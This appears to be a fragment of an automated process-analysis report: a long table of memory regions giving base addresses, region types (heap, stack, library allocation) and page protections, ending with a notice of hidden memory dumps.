|
heap
|
page read and write
|
||
25EE000
|
stack
|
page read and write
|
||
2A4A000
|
heap
|
page read and write
|
||
685B000
|
heap
|
page read and write
|
||
6B28000
|
trusted library allocation
|
page read and write
|
||
57F0000
|
heap
|
page read and write
|
||
4F43000
|
trusted library allocation
|
page read and write
|
||
2A1B000
|
heap
|
page read and write
|
||
88D0000
|
heap
|
page read and write
|
||
7D10000
|
trusted library allocation
|
page read and write
|
||
2A6C000
|
stack
|
page read and write
|
||
6675000
|
heap
|
page read and write
|
||
2A65000
|
heap
|
page read and write
|
||
6E7E000
|
stack
|
page read and write
|
||
28DE000
|
stack
|
page read and write
|
||
3559000
|
heap
|
page read and write
|
||
4CFF000
|
trusted library allocation
|
page read and write
|
||
6667000
|
heap
|
page read and write
|
||
2A53000
|
heap
|
page read and write
|
||
6B8D000
|
stack
|
page read and write
|
||
6181000
|
trusted library allocation
|
page read and write
|
||
2A01000
|
heap
|
page read and write
|
||
4C8F000
|
stack
|
page read and write
|
||
4C5F000
|
trusted library allocation
|
page read and write
|
||
2E60000
|
heap
|
page read and write
|
||
6817000
|
heap
|
page read and write
|
||
5850000
|
heap
|
page read and write
|
||
4C50000
|
heap
|
page read and write
|
||
72D0000
|
trusted library allocation
|
page read and write
|
||
7FB88000
|
trusted library allocation
|
page execute and read and write
|
||
5D09000
|
trusted library allocation
|
page read and write
|
||
682D000
|
heap
|
page read and write
|
||
4570000
|
heap
|
page execute and read and write
|
||
57DC000
|
heap
|
page read and write
|
||
79E000
|
heap
|
page read and write
|
||
60AE000
|
heap
|
page read and write
|
||
816E000
|
stack
|
page read and write
|
||
6185000
|
trusted library allocation
|
page read and write
|
||
6A10000
|
trusted library allocation
|
page read and write
|
||
6ACA000
|
stack
|
page read and write
|
||
6826000
|
heap
|
page read and write
|
||
2A01000
|
heap
|
page read and write
|
||
7B3000
|
heap
|
page read and write
|
||
7040000
|
heap
|
page execute and read and write
|
||
2AEF000
|
heap
|
page read and write
|
||
694D000
|
stack
|
page read and write
|
||
7650000
|
trusted library allocation
|
page read and write
|
||
7C6C000
|
heap
|
page read and write
|
||
6E35000
|
heap
|
page execute and read and write
|
||
6F7B000
|
stack
|
page read and write
|
||
7F6000
|
heap
|
page read and write
|
||
2A53000
|
heap
|
page read and write
|
||
7F7000
|
heap
|
page read and write
|
||
70A0000
|
trusted library allocation
|
page read and write
|
||
2B34000
|
heap
|
page read and write
|
||
7CB0000
|
heap
|
page read and write
|
||
7680000
|
trusted library allocation
|
page read and write
|
||
2A4A000
|
heap
|
page read and write
|
||
70EE000
|
stack
|
page read and write
|
||
68FD000
|
stack
|
page read and write
|
||
7D5000
|
heap
|
page read and write
|
||
6BD0000
|
heap
|
page read and write
|
||
703B000
|
heap
|
page read and write
|
||
682D000
|
heap
|
page read and write
|
||
76D0000
|
trusted library allocation
|
page read and write
|
||
2927000
|
heap
|
page read and write
|
||
6166000
|
heap
|
page read and write
|
||
7D2000
|
heap
|
page read and write
|
||
6173000
|
trusted library allocation
|
page read and write
|
||
1287000
|
heap
|
page read and write
|
||
60D6000
|
heap
|
page read and write
|
||
67F8000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
45E3000
|
trusted library allocation
|
page read and write
|
||
4B30000
|
trusted library allocation
|
page read and write
|
||
323C000
|
stack
|
page read and write
|
||
6822000
|
heap
|
page read and write
|
||
327D000
|
stack
|
page read and write
|
||
7005000
|
heap
|
page read and write
|
||
57B1000
|
heap
|
page read and write
|
||
7710000
|
trusted library allocation
|
page read and write
|
||
7D20000
|
heap
|
page read and write
|
||
71DE000
|
stack
|
page read and write
|
||
684B000
|
heap
|
page read and write
|
||
69C0000
|
trusted library allocation
|
page read and write
|
||
4A8E000
|
stack
|
page read and write
|
||
329000
|
stack
|
page read and write
|
||
685B000
|
heap
|
page read and write
|
||
75E000
|
stack
|
page read and write
|
||
2900000
|
heap
|
page read and write
|
||
4C91000
|
heap
|
page read and write
|
||
8AF5000
|
heap
|
page read and write
|
||
60E9000
|
heap
|
page read and write
|
||
7260000
|
trusted library allocation
|
page read and write
|
||
6846000
|
heap
|
page read and write
|
||
7019000
|
heap
|
page read and write
|
||
5808000
|
heap
|
page read and write
|
||
4CDD000
|
heap
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
607C000
|
heap
|
page read and write
|
||
60C9000
|
heap
|
page read and write
|
||
7E60000
|
trusted library allocation
|
page read and write
|
||
6A0F000
|
stack
|
page read and write
|
||
33F0000
|
heap
|
page read and write
|
||
718D000
|
stack
|
page read and write
|
||
2FF5000
|
heap
|
page read and write
|
||
5D80000
|
heap
|
page read and write
|
||
60E7000
|
heap
|
page read and write
|
||
684B000
|
heap
|
page read and write
|
||
33F5000
|
heap
|
page read and write
|
||
8EA0000
|
trusted library allocation
|
page read and write
|
||
47A0000
|
heap
|
page read and write
|
||
6846000
|
heap
|
page read and write
|
||
2976000
|
heap
|
page read and write
|
||
6836000
|
heap
|
page read and write
|
||
60E5000
|
heap
|
page read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
758E000
|
stack
|
page read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
4F08000
|
trusted library allocation
|
page read and write
|
||
2920000
|
heap
|
page read and write
|
||
35E8000
|
heap
|
page read and write
|
||
54EE000
|
stack
|
page read and write
|
||
6D7E000
|
stack
|
page read and write
|
||
5ED6000
|
heap
|
page read and write
|
||
2AC1000
|
heap
|
page read and write
|
||
2A33000
|
trusted library allocation
|
page execute and read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
2DC0000
|
trusted library allocation
|
page read and write
|
||
6822000
|
heap
|
page read and write
|
||
4EC0000
|
trusted library allocation
|
page read and write
|
||
6171000
|
trusted library allocation
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
615B000
|
stack
|
page read and write
|
||
2AD0000
|
heap
|
page read and write
|
||
7DFE000
|
stack
|
page read and write
|
||
4380000
|
trusted library allocation
|
page read and write
|
||
57CC000
|
heap
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
7F6000
|
heap
|
page read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
2BD0000
|
heap
|
page read and write
|
||
58E5000
|
heap
|
page read and write
|
||
57D9000
|
heap
|
page read and write
|
||
57AF000
|
stack
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
673F000
|
heap
|
page read and write
|
||
6671000
|
heap
|
page read and write
|
||
6836000
|
heap
|
page read and write
|
||
617C000
|
trusted library allocation
|
page read and write
|
||
4C87000
|
trusted library allocation
|
page read and write
|
||
478E000
|
stack
|
page read and write
|
||
2FE0000
|
heap
|
page read and write
|
||
2CE7000
|
heap
|
page read and write
|
||
6AFC000
|
stack
|
page read and write
|
||
81E0000
|
trusted library allocation
|
page read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
6DBF000
|
stack
|
page read and write
|
||
6842000
|
heap
|
page read and write
|
||
60DB000
|
heap
|
page read and write
|
||
2DC7000
|
trusted library allocation
|
page execute and read and write
|
||
29EE000
|
heap
|
page read and write
|
||
2A40000
|
heap
|
page read and write
|
||
7230000
|
trusted library allocation
|
page read and write
|
||
2DE0000
|
heap
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
7670000
|
trusted library allocation
|
page read and write
|
||
7E40000
|
heap
|
page read and write
|
||
4B2E000
|
stack
|
page read and write
|
||
617E000
|
trusted library allocation
|
page read and write
|
||
6EEF000
|
heap
|
page read and write
|
||
2A35000
|
heap
|
page read and write
|
||
7335000
|
heap
|
page read and write
|
||
682F000
|
heap
|
page read and write
|
||
698B000
|
stack
|
page read and write
|
||
6F89000
|
heap
|
page read and write
|
||
6185000
|
trusted library allocation
|
page read and write
|
||
60C9000
|
heap
|
page read and write
|
||
147F000
|
stack
|
page read and write
|
||
6836000
|
heap
|
page read and write
|
||
682F000
|
heap
|
page read and write
|
||
60E5000
|
heap
|
page read and write
|
||
6863000
|
heap
|
page read and write
|
||
6673000
|
heap
|
page read and write
|
||
6F3E000
|
stack
|
page read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
5650000
|
heap
|
page read and write
|
||
6181000
|
trusted library allocation
|
page read and write
|
||
4F50000
|
trusted library allocation
|
page read and write
|
||
60C9000
|
heap
|
page read and write
|
||
6836000
|
heap
|
page read and write
|
||
67CD000
|
heap
|
page read and write
|
||
7CC0000
|
trusted library allocation
|
page execute and read and write
|
||
7240000
|
trusted library allocation
|
page read and write
|
||
2A4A000
|
heap
|
page read and write
|
||
5300000
|
heap
|
page read and write
|
||
2E8E000
|
heap
|
page read and write
|
||
685B000
|
heap
|
page read and write
|
||
2DA9000
|
trusted library allocation
|
page read and write
|
||
7280000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
6831000
|
heap
|
page read and write
|
||
7D00000
|
trusted library allocation
|
page execute and read and write
|
||
4EFE000
|
stack
|
page read and write
|
||
4425000
|
heap
|
page execute and read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
5FCC000
|
heap
|
page read and write
|
||
5808000
|
heap
|
page read and write
|
||
71D0000
|
heap
|
page read and write
|
||
4870000
|
heap
|
page execute and read and write
|
||
6450000
|
trusted library allocation
|
page read and write
|
||
7270000
|
trusted library allocation
|
page read and write
|
||
2970000
|
trusted library allocation
|
page read and write
|
||
6739000
|
heap
|
page read and write
|
||
501E000
|
stack
|
page read and write
|
||
492F000
|
trusted library allocation
|
page read and write
|
||
682D000
|
heap
|
page read and write
|
||
6842000
|
heap
|
page read and write
|
||
80AE000
|
stack
|
page read and write
|
||
6846000
|
heap
|
page read and write
|
||
357A000
|
heap
|
page read and write
|
||
57E1000
|
heap
|
page read and write
|
||
708C000
|
stack
|
page read and write
|
||
684B000
|
heap
|
page read and write
|
||
4DF4000
|
trusted library allocation
|
page read and write
|
||
7E40000
|
trusted library allocation
|
page read and write
|
||
617A000
|
trusted library allocation
|
page read and write
|
||
465000
|
heap
|
page read and write
|
||
356B000
|
heap
|
page read and write
|
||
684C000
|
heap
|
page read and write
|
||
4CBF000
|
trusted library allocation
|
page read and write
|
||
67FD000
|
heap
|
page read and write
|
||
72DB000
|
trusted library allocation
|
page read and write
|
||
2CBA000
|
heap
|
page read and write
|
||
8B16000
|
heap
|
page read and write
|
||
2A37000
|
heap
|
page read and write
|
||
6224000
|
trusted library allocation
|
page read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
2966000
|
heap
|
page read and write
|
||
34E3000
|
heap
|
page read and write
|
||
2A65000
|
heap
|
page read and write
|
||
425000
|
stack
|
page read and write
|
||
47AF000
|
heap
|
page read and write
|
||
6F54000
|
heap
|
page read and write
|
||
5808000
|
heap
|
page read and write
|
||
684B000
|
heap
|
page read and write
|
||
7DF000
|
heap
|
page read and write
|
||
682F000
|
heap
|
page read and write
|
||
617C000
|
trusted library allocation
|
page read and write
|
||
6C0000
|
heap
|
page read and write
|
||
2F4B000
|
stack
|
page read and write
|
||
2A20000
|
trusted library allocation
|
page read and write
|
||
6753000
|
trusted library allocation
|
page read and write
|
||
2A9F000
|
heap
|
page read and write
|
||
681B000
|
heap
|
page read and write
|
||
60D6000
|
heap
|
page read and write
|
||
55A9000
|
trusted library allocation
|
page read and write
|
||
60E1000
|
heap
|
page read and write
|
||
354C000
|
heap
|
page read and write
|
||
609C000
|
heap
|
page read and write
|
||
3565000
|
heap
|
page read and write
|
||
7D7F000
|
stack
|
page read and write
|
||
7F6000
|
heap
|
page read and write
|
||
4318000
|
trusted library allocation
|
page read and write
|
||
685B000
|
heap
|
page read and write
|
||
36BE000
|
heap
|
page read and write
|
||
2A9C000
|
heap
|
page read and write
|
||
2990000
|
heap
|
page read and write
|
||
2BCE000
|
stack
|
page read and write
|
||
3560000
|
trusted library allocation
|
page read and write
|
||
6834000
|
heap
|
page read and write
|
||
7009000
|
heap
|
page read and write
|
||
7FB70000
|
trusted library allocation
|
page execute and read and write
|
||
3550000
|
trusted library allocation
|
page read and write
|
||
6108000
|
heap
|
page read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
5A25000
|
trusted library allocation
|
page read and write
|
||
34FE000
|
stack
|
page read and write
|
||
2A50000
|
trusted library allocation
|
page read and write
|
||
6826000
|
heap
|
page read and write
|
||
2A53000
|
heap
|
page read and write
|
||
6181000
|
trusted library allocation
|
page read and write
|
||
353E000
|
heap
|
page read and write
|
||
340D000
|
stack
|
page read and write
|
||
355D000
|
trusted library allocation
|
page execute and read and write
|
||
6B7E000
|
stack
|
page read and write
|
||
730B000
|
heap
|
page read and write
|
||
4D4B000
|
heap
|
page read and write
|
||
7200000
|
trusted library allocation
|
page execute and read and write
|
||
6185000
|
trusted library allocation
|
page read and write
|
||
7031000
|
heap
|
page read and write
|
||
8220000
|
heap
|
page read and write
|
||
67FD000
|
heap
|
page read and write
|
||
6181000
|
trusted library allocation
|
page read and write
|
||
2B27000
|
heap
|
page read and write
|
||
7A1000
|
heap
|
page read and write
|
||
4C65000
|
heap
|
page read and write
|
||
6842000
|
heap
|
page read and write
|
||
46D7000
|
trusted library allocation
|
page read and write
|
||
2A65000
|
trusted library allocation
|
page execute and read and write
|
||
2999000
|
trusted library allocation
|
page read and write
|
||
682D000
|
heap
|
page read and write
|
||
6858000
|
heap
|
page read and write
|
||
6181000
|
trusted library allocation
|
page read and write
|
||
685B000
|
heap
|
page read and write
|
||
5D69000
|
trusted library allocation
|
page read and write
|
||
580000
|
heap
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
617A000
|
trusted library allocation
|
page read and write
|
||
622B000
|
trusted library allocation
|
page read and write
|
||
6836000
|
heap
|
page read and write
|
||
6A2D000
|
stack
|
page read and write
|
||
51AE000
|
stack
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
6185000
|
trusted library allocation
|
page read and write
|
||
685B000
|
heap
|
page read and write
|
||
2F2C000
|
heap
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
7AF0000
|
direct allocation
|
page read and write
|
||
67BE000
|
heap
|
page read and write
|
||
4F1E000
|
stack
|
page read and write
|
||
67BE000
|
heap
|
page read and write
|
||
7260000
|
trusted library allocation
|
page read and write
|
||
6B60000
|
trusted library allocation
|
page read and write
|
||
67BB000
|
heap
|
page read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
685B000
|
heap
|
page read and write
|
||
456C000
|
stack
|
page read and write
|
||
2A60000
|
heap
|
page readonly
|
||
D10000
|
direct allocation
|
page read and write
|
||
5C7E000
|
stack
|
page read and write
|
||
7FCF0000
|
trusted library allocation
|
page execute and read and write
|
||
60D6000
|
heap
|
page read and write
|
||
6185000
|
trusted library allocation
|
page read and write
|
||
8B31000
|
heap
|
page read and write
|
||
452E000
|
stack
|
page read and write
|
||
6846000
|
heap
|
page read and write
|
||
67F4000
|
heap
|
page read and write
|
||
4D4C000
|
heap
|
page read and write
|
||
682D000
|
heap
|
page read and write
|
||
2A09000
|
heap
|
page read and write
|
||
7230000
|
trusted library allocation
|
page execute and read and write
|
||
8200000
|
trusted library allocation
|
page read and write
|
||
66BA000
|
heap
|
page read and write
|
||
6C6000
|
heap
|
page read and write
|
||
6185000
|
trusted library allocation
|
page read and write
|
||
72B0000
|
trusted library allocation
|
page read and write
|
||
6764000
|
trusted library allocation
|
page read and write
|
||
6D1F000
|
stack
|
page read and write
|
||
896D000
|
stack
|
page read and write
|
||
6F50000
|
trusted library allocation
|
page read and write
|
||
52EE000
|
stack
|
page read and write
|
||
4CD8000
|
heap
|
page read and write
|
||
7A8000
|
heap
|
page read and write
|
||
60D6000
|
heap
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
67FD000
|
heap
|
page read and write
|
||
70ED000
|
stack
|
page read and write
|
||
6817000
|
heap
|
page read and write
|
||
2A60000
|
trusted library allocation
|
page read and write
|
||
6741000
|
heap
|
page read and write
|
||
680A000
|
heap
|
page read and write
|
||
617C000
|
trusted library allocation
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
8150000
|
heap
|
page read and write
|
||
6741000
|
heap
|
page read and write
|
||
65B3000
|
heap
|
page read and write
|
||
7E75000
|
heap
|
page read and write
|
||
354C000
|
heap
|
page read and write
|
||
2DF0000
|
trusted library allocation
|
page read and write
|
||
5077000
|
heap
|
page read and write
|
||
2E50000
|
trusted library allocation
|
page execute and read and write
|
||
7C42000
|
heap
|
page read and write
|
||
60E5000
|
heap
|
page read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
2A1E000
|
stack
|
page read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
290D000
|
heap
|
page read and write
|
||
7080000
|
trusted library allocation
|
page read and write
|
||
6F40000
|
heap
|
page read and write
|
||
CB0000
|
direct allocation
|
page read and write
|
||
6831000
|
heap
|
page read and write
|
||
6D6E000
|
stack
|
page read and write
|
||
6817000
|
heap
|
page read and write
|
||
29D0000
|
trusted library allocation
|
page read and write
|
||
4AEE000
|
trusted library allocation
|
page read and write
|
||
353B000
|
heap
|
page read and write
|
||
2930000
|
heap
|
page read and write
|
||
353B000
|
heap
|
page read and write
|
||
285E000
|
stack
|
page read and write
|
||
7EC0000
|
trusted library allocation
|
page read and write
|
||
7060000
|
trusted library allocation
|
page read and write
|
||
6175000
|
trusted library allocation
|
page read and write
|
||
36B6000
|
heap
|
page read and write
|
||
356B000
|
heap
|
page read and write
|
||
42C0000
|
heap
|
page readonly
|
||
7CC0000
|
trusted library allocation
|
page read and write
|
||
60E1000
|
heap
|
page read and write
|
||
81DE000
|
stack
|
page read and write
|
||
6836000
|
heap
|
page read and write
|
||
4A0000
|
heap
|
page read and write
|
||
4E9A000
|
heap
|
page read and write
|
||
66EA000
|
heap
|
page read and write
|
||
29EE000
|
heap
|
page read and write
|
||
67C7000
|
heap
|
page read and write
|
||
28B0000
|
heap
|
page read and write
|
||
34A7000
|
heap
|
page read and write
|
||
4FF8000
|
trusted library allocation
|
page read and write
|
||
685B000
|
heap
|
page read and write
|
||
7D7E000
|
stack
|
page read and write
|
||
3579000
|
heap
|
page read and write
|
||
3582000
|
trusted library allocation
|
page read and write
|
||
43ED000
|
stack
|
page read and write
|
||
67F8000
|
heap
|
page read and write
|
||
60CB000
|
heap
|
page read and write
|
||
2ACE000
|
stack
|
page read and write
|
||
6836000
|
heap
|
page read and write
|
||
A6E000
|
stack
|
page read and write
|
||
54BE000
|
stack
|
page read and write
|
||
2FF0000
|
heap
|
page read and write
|
||
6831000
|
heap
|
page read and write
|
There are 1350 hidden memdumps, click here to show them.